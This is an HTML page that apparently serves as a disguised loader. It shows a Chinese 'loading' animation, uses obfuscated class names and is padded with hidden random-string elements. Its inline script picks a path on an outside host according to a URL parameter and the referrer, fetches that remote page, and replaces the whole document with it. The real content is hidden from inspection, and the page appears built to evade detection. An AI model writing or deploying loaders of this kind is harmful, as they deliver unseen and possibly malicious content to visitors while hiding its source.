<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TjstKm7R {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TjstKm7R .n4aWDPJo {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TjstKm7R .content {
            line-height: 50px;
            text-align: center
        }

        .TjstKm7R .img {
            width: 100%
        }

        .TjstKm7R .AXAr3w {
            text-align: center
        }

        .TjstKm7R .AXAr3w span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TjstKm7R .AXAr3w span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TjstKm7R .AXAr3w span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TjstKm7R .AXAr3w span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TjstKm7R .AXAr3w span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TjstKm7R .AXAr3w span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TjstKm7R .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function OcUM7ED7Uk9(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var GTkDQk = OcUM7ED7Uk9('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ GTkDQk +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ GTkDQk +".html?a=share";
		}
		
        vaqS2w0=url+"#"+new Date().getTime();
        vaqS2w0 && function() {
            $.get(vaqS2w0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>LEVa8QTWc4xLBMfTv4259WixPQou0NeuWHwX0wTnDblMr2H9R7URpwz0nF5xI2zdl4oqYkFAGjmufPxRKyBCTyQcd8q3ZbdBLOAd</a>
<a  href='#' style='display:none'>LEVa8QTWc4xLBMfTv4259WixPQou0NeuWHwX0wTnDblMr2H9R7URpwz0nF5xI2zdl4oqYkFAGjmufPxRKyBCTyQcd8q3ZbdBLOAd</a>
<span style='display:none'>rIJ8kEmO5tyIRmeu</span>
<b style='display:none' >JBW89lZdgL4K9IRhWyna3APG5NkWHSJlBbtk94vN481qMdsTU3CxkexmieYREWkmWfdJjavrvmY1zGx2ohWU3VGNyfsm89Cq</b>
<div style='display:none'>Q0rNuk4RcHGWrRNMaQFGZv0</div>
<div style='display:none'>Q0rNuk4RcHGWrRNMaQFGZv0</div>
<b style='display:none' >JBW89lZdgL4K9IRhWyna3APG5NkWHSJlBbtk94vN481qMdsTU3CxkexmieYREWkmWfdJjavrvmY1zGx2ohWU3VGNyfsm89Cq</b>
<a  href='#' style='display:none'>LEVa8QTWc4xLBMfTv4259WixPQou0NeuWHwX0wTnDblMr2H9R7URpwz0nF5xI2zdl4oqYkFAGjmufPxRKyBCTyQcd8q3ZbdBLOAd</a>
<p  style='display:none'>ZKL56pcXkaoNdlVDmpofiCQQlHaoq4gmRIHKTuFrxB</p><div class="TjstKm7R">
    <div class="n4aWDPJo">
        <div class="AXAr3w">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>zvzztq1N2gFs01pXuPw4lvYKo9anR</p>
<span style='display:none'>MzWNNBcacHwazHtSkjmtuIU3rkIpXhJ</span>
<img  src='' style='display:none'>
<p  style='display:none'>zvzztq1N2gFs01pXuPw4lvYKo9anR</p>
<p  style='display:none'>zvzztq1N2gFs01pXuPw4lvYKo9anR</p>
<span style='display:none'>MzWNNBcacHwazHtSkjmtuIU3rkIpXhJ</span>
<p  style='display:none'>zvzztq1N2gFs01pXuPw4lvYKo9anR</p>
<b style='display:none' >nuvMVgZMGExweSHSYKlOBxQSbt9EF9isgoTIQLhHFnVgMp8a</b>
<b style='display:none' >nuvMVgZMGExweSHSYKlOBxQSbt9EF9isgoTIQLhHFnVgMp8a</b></body>
</html>